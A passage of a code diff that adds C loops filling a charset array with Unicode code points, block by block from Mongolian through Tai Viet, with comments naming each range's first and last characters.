+	c = 0x1880;		// from MONGOLIAN LETTER ALI GALI ANUSVARA ONE
+	while (c <= 0x18aa)	// ..to MONGOLIAN LETTER MANCHU ALI GALI LHA
+		charset[i++] = c++;
+// 18B0..18FF; Unified Canadian Aboriginal Syllabics Extended
+	c = 0x18b0;		// from CANADIAN SYLLABICS OY
+	while (c <= 0x18f5)	// ..to CANADIAN SYLLABICS CARRIER DENTAL S
+		charset[i++] = c++;
+// 1900..194F; Limbu
+	c = 0x1900;		// from LIMBU VOWEL-CARRIER LETTER
+	while (c <= 0x191e)	// ..to LIMBU LETTER TRA
+		charset[i++] = c++;
+	c = 0x1920;		// from LIMBU VOWEL SIGN A
+	while (c <= 0x192b)	// ..to LIMBU SUBJOINED LETTER WA
+		charset[i++] = c++;
+	c = 0x1930;		// from LIMBU SMALL LETTER KA
+	while (c <= 0x193b)	// ..to LIMBU SIGN SA-I
+		charset[i++] = c++;
+	c = 0x1944;		// from LIMBU EXCLAMATION MARK
+	while (c <= 0x194f)	// ..to LIMBU DIGIT NINE
+		charset[i++] = c++;
+// 1950..197F; Tai Le
+	c = 0x1950;		// from TAI LE LETTER KA
+	while (c <= 0x196d)	// ..to TAI LE LETTER AI
+		charset[i++] = c++;
+	c = 0x1970;		// from TAI LE LETTER TONE-2
+	while (c <= 0x1974)	// ..to TAI LE LETTER TONE-6
+		charset[i++] = c++;
+// 1980..19DF; New Tai Lue
+	c = 0x1980;		// from NEW TAI LUE LETTER HIGH QA
+	while (c <= 0x19ab)	// ..to NEW TAI LUE LETTER LOW SUA
+		charset[i++] = c++;
+	c = 0x19b0;		// from NEW TAI LUE VOWEL SIGN VOWEL SHORTENER
+	while (c <= 0x19c9)	// ..to NEW TAI LUE TONE MARK-2
+		charset[i++] = c++;
+	c = 0x19d0;		// from NEW TAI LUE DIGIT ZERO
+	while (c <= 0x19da)	// ..to NEW TAI LUE THAM DIGIT ONE
+		charset[i++] = c++;
+	charset[i++] = 0x19de;	// NEW TAI LUE SIGN LAE
+	charset[i++] = 0x19df;	// NEW TAI LUE SIGN LAEV
+// 19E0..19FF; Khmer Symbols
+	c = 0x19e0;		// from KHMER SYMBOL PATHAMASAT
+	while (c <= 0x19ff)	// ..to KHMER SYMBOL DAP-PRAM ROC
+		charset[i++] = c++;
+// 1A00..1A1F; Buginese
+	c = 0x1a00;		// from BUGINESE LETTER KA
+	while (c <= 0x1a1b)	// ..to BUGINESE VOWEL SIGN AE
+		charset[i++] = c++;
+	charset[i++] = 0x1a1e;	// BUGINESE PALLAWA
+	charset[i++] = 0x1a1f;	// BUGINESE END OF SECTION
+// 1A20..1AAF; Tai Tham
+	c = 0x1a20;		// from TAI THAM LETTER HIGH KA
+	while (c <= 0x1a5e)	// ..to TAI THAM CONSONANT SIGN SA
+		charset[i++] = c++;
+	c = 0x1a60;		// from TAI THAM SIGN SAKOT
+	while (c <= 0x1a7c)	// ..to TAI THAM SIGN KHUEN-LUE KARAN
+		charset[i++] = c++;
+	c = 0x1a7f;		// from TAI THAM COMBINING CRYPTOGRAMMIC DOT
+	while (c <= 0x1a89)	// ..to TAI THAM HORA DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1a90;		// from TAI THAM THAM DIGIT ZERO
+	while (c <= 0x1a99)	// ..to TAI THAM THAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1aa0;		// from TAI THAM SIGN WIANG
+	while (c <= 0x1aad)	// ..to TAI THAM SIGN CAANG
+		charset[i++] = c++;
+// 1AB0..1AFF; Combining Diacritical Marks Extended
+	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
+	while (c <= 0x1abe)	// ..to COMBINING PARENTHESES OVERLAY
+		charset[i++] = c++;
+// 1B00..1B7F; Balinese
+	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
+	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+		charset[i++] = c++;
+	c = 0x1b50;		// from BALINESE DIGIT ZERO
+	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+		charset[i++] = c++;
+// 1B80..1BBF; Sundanese
+	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
+	while (c <= 0x1bbf)	// ..to SUNDANESE LETTER FINAL M
+		charset[i++] = c++;
+// 1BC0..1BFF; Batak
+	c = 0x1bc0;		// from BATAK LETTER A
+	while (c <= 0x1bf3)	// ..to BATAK PANONGONAN
+		charset[i++] = c++;
+	c = 0x1bfc;		// from BATAK SYMBOL BINDU NA METEK
+	while (c <= 0x1bff)	// ..to BATAK SYMBOL BINDU PANGOLAT
+		charset[i++] = c++;
+// 1C00..1C4F; Lepcha
+	c = 0x1c00;		// from LEPCHA LETTER KA
+	while (c <= 0x1c37)	// ..to LEPCHA SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x1c3b;		// from LEPCHA PUNCTUATION TA-ROL
+	while (c <= 0x1c49)	// ..to LEPCHA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1c4d;	// LEPCHA LETTER TTA
+	charset[i++] = 0x1c4f;	// LEPCHA LETTER DDA
+// 1C50..1C7F; Ol Chiki
+	c = 0x1c50;		// from OL CHIKI DIGIT ZERO
+	while (c <= 0x1c7f)	// ..to OL CHIKI PUNCTUATION DOUBLE MUCAAD
+		charset[i++] = c++;
+// 1C80..1C8F; Cyrillic Extended-C
+	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
+	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+		charset[i++] = c++;
+// 1C90..1CBF; Georgian Extended
+	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
+	while (c <= 0x1cba)	// ..to GEORGIAN MTAVRULI CAPITAL LETTER AIN
+		charset[i++] = c++;
+	charset[i++] = 0x1cbd;	// GEORGIAN MTAVRULI CAPITAL LETTER AEN
+	charset[i++] = 0x1cbf;	// GEORGIAN MTAVRULI CAPITAL LETTER LABIAL SIGN
+// 1CC0..1CCF; Sundanese Supplement
+	c = 0x1cc0;		// from SUNDANESE PUNCTUATION BINDU SURYA
+	while (c <= 0x1cc7)	// ..to SUNDANESE PUNCTUATION BINDU BA SATANGA
+		charset[i++] = c++;
+// 1CD0..1CFF; Vedic Extensions
+	c = 0x1cd0;		// from VEDIC TONE KARSHANA
+	while (c <= 0x1cf9)	// ..to VEDIC TONE DOUBLE RING ABOVE
+		charset[i++] = c++;
+// 1D00..1D7F; Phonetic Extensions
+	c = 0x1d00;		// from LATIN LETTER SMALL CAPITAL A
+	while (c <= 0x1d7f)	// ..to LATIN SMALL LETTER UPSILON WITH STROKE
+		charset[i++] = c++;
+// 1D80..1DBF; Phonetic Extensions Supplement
+	c = 0x1d80;		// from LATIN SMALL LETTER B WITH PALATAL HOOK
+	while (c <= 0x1dbf)	// ..to MODIFIER LETTER SMALL THETA
+		charset[i++] = c++;
+// 1DC0..1DFF; Combining Diacritical Marks Supplement
+	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
+	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
+		charset[i++] = c++;
+	c = 0x1dfb;		// from COMBINING DELETION MARK
+	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
+		charset[i++] = c++;
+// 1E00..1EFF; Latin Extended Additional
+	c = 0x1e00;		// from LATIN CAPITAL LETTER A WITH RING BELOW
+	while (c <= 0x1eff)	// ..to LATIN SMALL LETTER Y WITH LOOP
+		charset[i++] = c++;
+// 1F00..1FFF; Greek Extended
+	c = 0x1f00;		// from GREEK SMALL LETTER ALPHA WITH PSILI
+	while (c <= 0x1f15)	// ..to GREEK SMALL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f18;		// from GREEK CAPITAL LETTER EPSILON WITH PSILI
+	while (c <= 0x1f1d)	// ..to GREEK CAPITAL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f20;		// from GREEK SMALL LETTER ETA WITH PSILI
+	while (c <= 0x1f45)	// ..to GREEK SMALL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f48;		// from GREEK CAPITAL LETTER OMICRON WITH PSILI
+	while (c <= 0x1f4d)	// ..to GREEK CAPITAL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f50;		// from GREEK SMALL LETTER UPSILON WITH PSILI
+	while (c <= 0x1f57)	// ..to GREEK SMALL LETTER UPSILON WITH DASIA AND PERISPOMENI
+		charset[i++] = c++;
+	c = 0x1f5f;		// from GREEK CAPITAL LETTER UPSILON WITH DASIA AND PERISPOMENI
+	while (c <= 0x1f7d)	// ..to GREEK SMALL LETTER OMEGA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1f80;		// from GREEK SMALL LETTER ALPHA WITH PSILI AND YPOGEGRAMMENI
+	while (c <= 0x1fb4)	// ..to GREEK SMALL LETTER ALPHA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fb6;		// from GREEK SMALL LETTER ALPHA WITH PERISPOMENI
+	while (c <= 0x1fc4)	// ..to GREEK SMALL LETTER ETA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fc6;		// from GREEK SMALL LETTER ETA WITH PERISPOMENI
+	while (c <= 0x1fd3)	// ..to GREEK SMALL LETTER IOTA WITH DIALYTIKA AND OXIA
+		charset[i++] = c++;
+	c = 0x1fd6;		// from GREEK SMALL LETTER IOTA WITH PERISPOMENI
+	while (c <= 0x1fdb)	// ..to GREEK CAPITAL LETTER IOTA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1fdd;		// from GREEK DASIA AND VARIA
+	while (c <= 0x1fef)	// ..to GREEK VARIA
+		charset[i++] = c++;
+	charset[i++] = 0x1ff2;	// GREEK SMALL LETTER OMEGA WITH VARIA AND YPOGEGRAMMENI
+	charset[i++] = 0x1ff4;	// GREEK SMALL LETTER OMEGA WITH OXIA AND YPOGEGRAMMENI
+	c = 0x1ff6;		// from GREEK SMALL LETTER OMEGA WITH PERISPOMENI
+	while (c <= 0x1ffe)	// ..to GREEK DASIA
+		charset[i++] = c++;
+// 2000..206F; General Punctuation
+	c = 0x2000;		// from EN QUAD
+	while (c <= 0x2064)	// ..to INVISIBLE PLUS
+		charset[i++] = c++;
+	c = 0x2066;		// from LEFT-TO-RIGHT ISOLATE
+	while (c <= 0x206f)	// ..to NOMINAL DIGIT SHAPES
+		charset[i++] = c++;
+// 2070..209F; Superscripts and Subscripts
+	charset[i++] = 0x2070;	// SUPERSCRIPT ZERO
+	charset[i++] = 0x2071;	// SUPERSCRIPT LATIN SMALL LETTER I
+	c = 0x2074;		// from SUPERSCRIPT FOUR
+	while (c <= 0x208e)	// ..to SUBSCRIPT RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0x2090;		// from LATIN SUBSCRIPT SMALL LETTER A
+	while (c <= 0x209c)	// ..to LATIN SUBSCRIPT SMALL LETTER T
+		charset[i++] = c++;
+// 20A0..20CF; Currency Symbols
+	c = 0x20a0;		// from EURO-CURRENCY SIGN
+	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+		charset[i++] = c++;
+// 20D0..20FF; Combining Diacritical Marks for Symbols
+	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
+	while (c <= 0x20f0)	// ..to COMBINING ASTERISK ABOVE
+		charset[i++] = c++;
+// 2100..214F; Letterlike Symbols
+	c = 0x2100;		// from ACCOUNT OF
+	while (c <= 0x214f)	// ..to SYMBOL FOR SAMARITAN SOURCE
+		charset[i++] = c++;
+// 2150..218F; Number Forms
+	c = 0x2150;		// from VULGAR FRACTION ONE SEVENTH
+	while (c <= 0x218b)	// ..to TURNED DIGIT THREE
+		charset[i++] = c++;
+// 2190..21FF; Arrows
+	c = 0x2190;		// from LEFTWARDS ARROW
+	while (c <= 0x21ff)	// ..to LEFT RIGHT OPEN-HEADED ARROW
+		charset[i++] = c++;
+// 2200..22FF; Mathematical Operators
+	c = 0x2200;		// from FOR ALL
+	while (c <= 0x22ff)	// ..to Z NOTATION BAG MEMBERSHIP
+		charset[i++] = c++;
+// 2300..23FF; Miscellaneous Technical
+	c = 0x2300;		// from DIAMETER SIGN
+	while (c <= 0x23ff)	// ..to OBSERVER EYE SYMBOL
+		charset[i++] = c++;
+// 2400..243F; Control Pictures
+	c = 0x2400;		// from SYMBOL FOR NULL
+	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+		charset[i++] = c++;
+// 2440..245F; Optical Character Recognition
+	c = 0x2440;		// from OCR HOOK
+	while (c <= 0x244a)	// ..to OCR DOUBLE BACKSLASH
+		charset[i++] = c++;
+// 2460..24FF; Enclosed Alphanumerics
+	c = 0x2460;		// from CIRCLED DIGIT ONE
+	while (c <= 0x24ff)	// ..to NEGATIVE CIRCLED DIGIT ZERO
+		charset[i++] = c++;
+// 2500..257F; Box Drawing
+	c = 0x2500;		// from BOX DRAWINGS LIGHT HORIZONTAL
+	while (c <= 0x257f)	// ..to BOX DRAWINGS HEAVY UP AND LIGHT DOWN
+		charset[i++] = c++;
+// 2580..259F; Block Elements
+	c = 0x2580;		// from UPPER HALF BLOCK
+	while (c <= 0x259f)	// ..to QUADRANT UPPER RIGHT AND LOWER LEFT AND LOWER RIGHT
+		charset[i++] = c++;
+// 25A0..25FF; Geometric Shapes
+	c = 0x25a0;		// from BLACK SQUARE
+	while (c <= 0x25ff)	// ..to LOWER RIGHT TRIANGLE
+		charset[i++] = c++;
+// 2600..26FF; Miscellaneous Symbols
+	c = 0x2600;		// from BLACK SUN WITH RAYS
+	while (c <= 0x26ff)	// ..to WHITE FLAG WITH HORIZONTAL MIDDLE BLACK STRIPE
+		charset[i++] = c++;
+// 2700..27BF; Dingbats
+	c = 0x2700;		// from BLACK SAFETY SCISSORS
+	while (c <= 0x27bf)	// ..to DOUBLE CURLY LOOP
+		charset[i++] = c++;
+// 27C0..27EF; Miscellaneous Mathematical Symbols-A
+	c = 0x27c0;		// from THREE DIMENSIONAL ANGLE
+	while (c <= 0x27ef)	// ..to MATHEMATICAL RIGHT FLATTENED PARENTHESIS
+		charset[i++] = c++;
+// 27F0..27FF; Supplemental Arrows-A
+	c = 0x27f0;		// from UPWARDS QUADRUPLE ARROW
+	while (c <= 0x27ff)	// ..to LONG RIGHTWARDS SQUIGGLE ARROW
+		charset[i++] = c++;
+// 2800..28FF; Braille Patterns
+	c = 0x2800;		// from BRAILLE PATTERN BLANK
+	while (c <= 0x28ff)	// ..to BRAILLE PATTERN DOTS-12345678
+		charset[i++] = c++;
+// 2900..297F; Supplemental Arrows-B
+	c = 0x2900;		// from RIGHTWARDS TWO-HEADED ARROW WITH VERTICAL STROKE
+	while (c <= 0x297f)	// ..to DOWN FISH TAIL
+		charset[i++] = c++;
+// 2980..29FF; Miscellaneous Mathematical Symbols-B
+	c = 0x2980;		// from TRIPLE VERTICAL BAR DELIMITER
+	while (c <= 0x29ff)	// ..to MINY
+		charset[i++] = c++;
+// 2A00..2AFF; Supplemental Mathematical Operators
+	c = 0x2a00;		// from N-ARY CIRCLED DOT OPERATOR
+	while (c <= 0x2aff)	// ..to N-ARY WHITE VERTICAL BAR
+		charset[i++] = c++;
+// 2B00..2BFF; Miscellaneous Symbols and Arrows
+	c = 0x2b00;		// from NORTH EAST WHITE ARROW
+	while (c <= 0x2b73)	// ..to DOWNWARDS TRIANGLE-HEADED ARROW TO BAR
+		charset[i++] = c++;
+	c = 0x2b76;		// from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
+	while (c <= 0x2b95)	// ..to RIGHTWARDS BLACK ARROW
+		charset[i++] = c++;
+	c = 0x2b98;		// from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
+	while (c <= 0x2bc8)	// ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
+		charset[i++] = c++;
+	c = 0x2bca;		// from TOP HALF BLACK CIRCLE
+	while (c <= 0x2bfe)	// ..to REVERSED RIGHT ANGLE
+		charset[i++] = c++;
+// 2C00..2C5F; Glagolitic
+	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
+	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
+	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+// 2C60..2C7F; Latin Extended-C
+	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
+	while (c <= 0x2c7f)	// ..to LATIN CAPITAL LETTER Z WITH SWASH TAIL
+		charset[i++] = c++;
+// 2C80..2CFF; Coptic
+	c = 0x2c80;		// from COPTIC CAPITAL LETTER ALFA
+	while (c <= 0x2cf3)	// ..to COPTIC SMALL LETTER BOHAIRIC KHEI
+		charset[i++] = c++;
+	c = 0x2cf9;		// from COPTIC OLD NUBIAN FULL STOP
+	while (c <= 0x2cff)	// ..to COPTIC MORPHOLOGICAL DIVIDER
+		charset[i++] = c++;
+// 2D00..2D2F; Georgian Supplement
+	c = 0x2d00;		// from GEORGIAN SMALL LETTER AN
+	while (c <= 0x2d25)	// ..to GEORGIAN SMALL LETTER HOE
+		charset[i++] = c++;
+	c = 0x2d27;		// from GEORGIAN SMALL LETTER YN
+	while (c <= 0x2d2d)	// ..to GEORGIAN SMALL LETTER AEN
+		charset[i++] = c++;
+// 2D30..2D7F; Tifinagh
+	c = 0x2d30;		// from TIFINAGH LETTER YA
+	while (c <= 0x2d67)	// ..to TIFINAGH LETTER YO
+		charset[i++] = c++;
+	charset[i++] = 0x2d6f;	// TIFINAGH MODIFIER LETTER LABIALIZATION MARK
+	charset[i++] = 0x2d70;	// TIFINAGH SEPARATOR MARK
+	charset[i++] = 0x2d7f;	// TIFINAGH CONSONANT JOINER
+// 2D80..2DDF; Ethiopic Extended
+	c = 0x2d80;		// from ETHIOPIC SYLLABLE LOA
+	while (c <= 0x2d96)	// ..to ETHIOPIC SYLLABLE GGWE
+		charset[i++] = c++;
+	c = 0x2da0;		// from ETHIOPIC SYLLABLE SSA
+	while (c <= 0x2da6)	// ..to ETHIOPIC SYLLABLE SSO
+		charset[i++] = c++;
+	c = 0x2da8;		// from ETHIOPIC SYLLABLE CCA
+	while (c <= 0x2dae)	// ..to ETHIOPIC SYLLABLE CCO
+		charset[i++] = c++;
+	c = 0x2db0;		// from ETHIOPIC SYLLABLE ZZA
+	while (c <= 0x2db6)	// ..to ETHIOPIC SYLLABLE ZZO
+		charset[i++] = c++;
+	c = 0x2db8;		// from ETHIOPIC SYLLABLE CCHA
+	while (c <= 0x2dbe)	// ..to ETHIOPIC SYLLABLE CCHO
+		charset[i++] = c++;
+	c = 0x2dc0;		// from ETHIOPIC SYLLABLE QYA
+	while (c <= 0x2dc6)	// ..to ETHIOPIC SYLLABLE QYO
+		charset[i++] = c++;
+	c = 0x2dc8;		// from ETHIOPIC SYLLABLE KYA
+	while (c <= 0x2dce)	// ..to ETHIOPIC SYLLABLE KYO
+		charset[i++] = c++;
+	c = 0x2dd0;		// from ETHIOPIC SYLLABLE XYA
+	while (c <= 0x2dd6)	// ..to ETHIOPIC SYLLABLE XYO
+		charset[i++] = c++;
+	c = 0x2dd8;		// from ETHIOPIC SYLLABLE GYA
+	while (c <= 0x2dde)	// ..to ETHIOPIC SYLLABLE GYO
+		charset[i++] = c++;
+// 2DE0..2DFF; Cyrillic Extended-A
+	c = 0x2de0;		// from COMBINING CYRILLIC LETTER BE
+	while (c <= 0x2dff)	// ..to COMBINING CYRILLIC LETTER IOTIFIED BIG YUS
+		charset[i++] = c++;
+// 2E00..2E7F; Supplemental Punctuation
+	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
+	while (c <= 0x2e4e)	// ..to PUNCTUS ELEVATUS MARK
+		charset[i++] = c++;
+// 2E80..2EFF; CJK Radicals Supplement
+	c = 0x2e80;		// from CJK RADICAL REPEAT
+	while (c <= 0x2e99)	// ..to CJK RADICAL RAP
+		charset[i++] = c++;
+	c = 0x2e9b;		// from CJK RADICAL CHOKE
+	while (c <= 0x2ef3)	// ..to CJK RADICAL C-SIMPLIFIED TURTLE
+		charset[i++] = c++;
+// 2F00..2FDF; Kangxi Radicals
+	c = 0x2f00;		// from KANGXI RADICAL ONE
+	while (c <= 0x2fd5)	// ..to KANGXI RADICAL FLUTE
+		charset[i++] = c++;
+// 2FF0..2FFF; Ideographic Description Characters
+	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
+	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+		charset[i++] = c++;
+// 3000..303F; CJK Symbols and Punctuation
+	c = 0x3000;		// from IDEOGRAPHIC SPACE
+	while (c <= 0x303f)	// ..to IDEOGRAPHIC HALF FILL SPACE
+		charset[i++] = c++;
+// 3040..309F; Hiragana
+	c = 0x3041;		// from HIRAGANA LETTER SMALL A
+	while (c <= 0x3096)	// ..to HIRAGANA LETTER SMALL KE
+		charset[i++] = c++;
+	c = 0x3099;		// from COMBINING KATAKANA-HIRAGANA VOICED SOUND MARK
+	while (c <= 0x309f)	// ..to HIRAGANA DIGRAPH YORI
+		charset[i++] = c++;
+// 30A0..30FF; Katakana
+	c = 0x30a0;		// from KATAKANA-HIRAGANA DOUBLE HYPHEN
+	while (c <= 0x30ff)	// ..to KATAKANA DIGRAPH KOTO
+		charset[i++] = c++;
+// 3100..312F; Bopomofo
+	c = 0x3105;		// from BOPOMOFO LETTER B
+	while (c <= 0x312f)	// ..to BOPOMOFO LETTER NN
+		charset[i++] = c++;
+// 3130..318F; Hangul Compatibility Jamo
+	c = 0x3131;		// from HANGUL LETTER KIYEOK
+	while (c <= 0x318e)	// ..to HANGUL LETTER ARAEAE
+		charset[i++] = c++;
+// 3190..319F; Kanbun
+	c = 0x3190;		// from IDEOGRAPHIC ANNOTATION LINKING MARK
+	while (c <= 0x319f)	// ..to IDEOGRAPHIC ANNOTATION MAN MARK
+		charset[i++] = c++;
+// 31A0..31BF; Bopomofo Extended
+	c = 0x31a0;		// from BOPOMOFO LETTER BU
+	while (c <= 0x31ba)	// ..to BOPOMOFO LETTER ZY
+		charset[i++] = c++;
+// 31C0..31EF; CJK Strokes
+	c = 0x31c0;		// from CJK STROKE T
+	while (c <= 0x31e3)	// ..to CJK STROKE Q
+		charset[i++] = c++;
+// 31F0..31FF; Katakana Phonetic Extensions
+	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
+	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
+		charset[i++] = c++;
+// 3200..32FF; Enclosed CJK Letters and Months
+	c = 0x3200;		// from PARENTHESIZED HANGUL KIYEOK
+	while (c <= 0x321e)	// ..to PARENTHESIZED KOREAN CHARACTER O HU
+		charset[i++] = c++;
+	c = 0x3220;		// from PARENTHESIZED IDEOGRAPH ONE
+	while (c <= 0x32fe)	// ..to CIRCLED KATAKANA WO
+		charset[i++] = c++;
+// 3300..33FF; CJK Compatibility
+	c = 0x3300;		// from SQUARE APAATO
+	while (c <= 0x33ff)	// ..to SQUARE GAL
+		charset[i++] = c++;
+// 3400..4DBF; CJK Unified Ideographs Extension A
+	c = 0x3400;		// from <CJK Ideograph Extension A, First>
+	while (c <= 0x4db5)	// ..to <CJK Ideograph Extension A, Last>
+		charset[i++] = c++;
+// 4DC0..4DFF; Yijing Hexagram Symbols
+	c = 0x4dc0;		// from HEXAGRAM FOR THE CREATIVE HEAVEN
+	while (c <= 0x4dff)	// ..to HEXAGRAM FOR BEFORE COMPLETION
+		charset[i++] = c++;
+// 4E00..9FFF; CJK Unified Ideographs
+	c = 0x4e00;		// from <CJK Ideograph, First>
+	while (c <= 0x9fef)	// ..to <CJK Ideograph, Last>
+		charset[i++] = c++;
+// A000..A48F; Yi Syllables
+	c = 0xa000;		// from YI SYLLABLE IT
+	while (c <= 0xa48c)	// ..to YI SYLLABLE YYR
+		charset[i++] = c++;
+// A490..A4CF; Yi Radicals
+	c = 0xa490;		// from YI RADICAL QOT
+	while (c <= 0xa4c6)	// ..to YI RADICAL KE
+		charset[i++] = c++;
+// A4D0..A4FF; Lisu
+	c = 0xa4d0;		// from LISU LETTER BA
+	while (c <= 0xa4ff)	// ..to LISU PUNCTUATION FULL STOP
+		charset[i++] = c++;
+// A500..A63F; Vai
+	c = 0xa500;		// from VAI SYLLABLE EE
+	while (c <= 0xa62b)	// ..to VAI SYLLABLE NDOLE DO
+		charset[i++] = c++;
+// A640..A69F; Cyrillic Extended-B
+	c = 0xa640;		// from CYRILLIC CAPITAL LETTER ZEMLYA
+	while (c <= 0xa69f)	// ..to COMBINING CYRILLIC LETTER IOTIFIED E
+		charset[i++] = c++;
+// A6A0..A6FF; Bamum
+	c = 0xa6a0;		// from BAMUM LETTER A
+	while (c <= 0xa6f7)	// ..to BAMUM QUESTION MARK
+		charset[i++] = c++;
+// A700..A71F; Modifier Tone Letters
+	c = 0xa700;		// from MODIFIER LETTER CHINESE TONE YIN PING
+	while (c <= 0xa71f)	// ..to MODIFIER LETTER LOW INVERTED EXCLAMATION MARK
+		charset[i++] = c++;
+// A720..A7FF; Latin Extended-D
+	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
+	while (c <= 0xa7b9)	// ..to LATIN SMALL LETTER U WITH STROKE
+		charset[i++] = c++;
+	c = 0xa7f7;		// from LATIN EPIGRAPHIC LETTER SIDEWAYS I
+	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
+		charset[i++] = c++;
+// A800..A82F; Syloti Nagri
+	c = 0xa800;		// from SYLOTI NAGRI LETTER A
+	while (c <= 0xa82b)	// ..to SYLOTI NAGRI POETRY MARK-4
+		charset[i++] = c++;
+// A830..A83F; Common Indic Number Forms
+	c = 0xa830;		// from NORTH INDIC FRACTION ONE QUARTER
+	while (c <= 0xa839)	// ..to NORTH INDIC QUANTITY MARK
+		charset[i++] = c++;
+// A840..A87F; Phags-pa
+	c = 0xa840;		// from PHAGS-PA LETTER KA
+	while (c <= 0xa877)	// ..to PHAGS-PA MARK DOUBLE SHAD
+		charset[i++] = c++;
+// A880..A8DF; Saurashtra
+	c = 0xa880;		// from SAURASHTRA SIGN ANUSVARA
+	while (c <= 0xa8c5)	// ..to SAURASHTRA SIGN CANDRABINDU
+		charset[i++] = c++;
+	c = 0xa8ce;		// from SAURASHTRA DANDA
+	while (c <= 0xa8d9)	// ..to SAURASHTRA DIGIT NINE
+		charset[i++] = c++;
+// A8E0..A8FF; Devanagari Extended
+	c = 0xa8e0;		// from COMBINING DEVANAGARI DIGIT ZERO
+	while (c <= 0xa8ff)	// ..to DEVANAGARI VOWEL SIGN AY
+		charset[i++] = c++;
+// A900..A92F; Kayah Li
+	c = 0xa900;		// from KAYAH LI DIGIT ZERO
+	while (c <= 0xa92f)	// ..to KAYAH LI SIGN SHYA
+		charset[i++] = c++;
+// A930..A95F; Rejang
+	c = 0xa930;		// from REJANG LETTER KA
+	while (c <= 0xa953)	// ..to REJANG VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xa95f;	// REJANG SECTION MARK
+// A960..A97F; Hangul Jamo Extended-A
+	c = 0xa960;		// from HANGUL CHOSEONG TIKEUT-MIEUM
+	while (c <= 0xa97c)	// ..to HANGUL CHOSEONG SSANGYEORINHIEUH
+		charset[i++] = c++;
+// A980..A9DF; Javanese
+	c = 0xa980;		// from JAVANESE SIGN PANYANGGA
+	while (c <= 0xa9cd)	// ..to JAVANESE TURNED PADA PISELEH
+		charset[i++] = c++;
+	c = 0xa9cf;		// from JAVANESE PANGRANGKEP
+	while (c <= 0xa9d9)	// ..to JAVANESE DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xa9de;	// JAVANESE PADA TIRTA TUMETES
+	charset[i++] = 0xa9df;	// JAVANESE PADA ISEN-ISEN
+// A9E0..A9FF; Myanmar Extended-B
+	c = 0xa9e0;		// from MYANMAR LETTER SHAN GHA
+	while (c <= 0xa9fe)	// ..to MYANMAR LETTER TAI LAING BHA
+		charset[i++] = c++;
+// AA00..AA5F; Cham
+	c = 0xaa00;		// from CHAM LETTER A
+	while (c <= 0xaa36)	// ..to CHAM CONSONANT SIGN WA
+		charset[i++] = c++;
+	c = 0xaa40;		// from CHAM LETTER FINAL K
+	while (c <= 0xaa4d)	// ..to CHAM CONSONANT SIGN FINAL H
+		charset[i++] = c++;
+	c = 0xaa50;		// from CHAM DIGIT ZERO
+	while (c <= 0xaa59)	// ..to CHAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0xaa5c;		// from CHAM PUNCTUATION SPIRAL
+	while (c <= 0xaa5f)	// ..to CHAM PUNCTUATION TRIPLE DANDA
+		charset[i++] = c++;
+// AA60..AA7F; Myanmar Extended-A
+	c = 0xaa60;		// from MYANMAR LETTER KHAMTI GA
+	while (c <= 0xaa7f)	// ..to MYANMAR LETTER SHWE PALAUNG SHA
+		charset[i++] = c++;
+// AA80..AADF; Tai Viet
+	c = 0xaa80;		// from TAI VIET LETTER LOW KO
+	while (c <= 0xaac2)	// ..to TAI VIET TONE MAI SONG
+		charset[i++] = c++;
+	c = 0xaadb;		// from TAI VIET SYMBOL KON
+	while (c <= 0xaadf)	// ..to TAI VIET SYMBOL KOI KOI
+		charset[i++] = c++;
+// AAE0..AAFF; Meetei Mayek Extensions
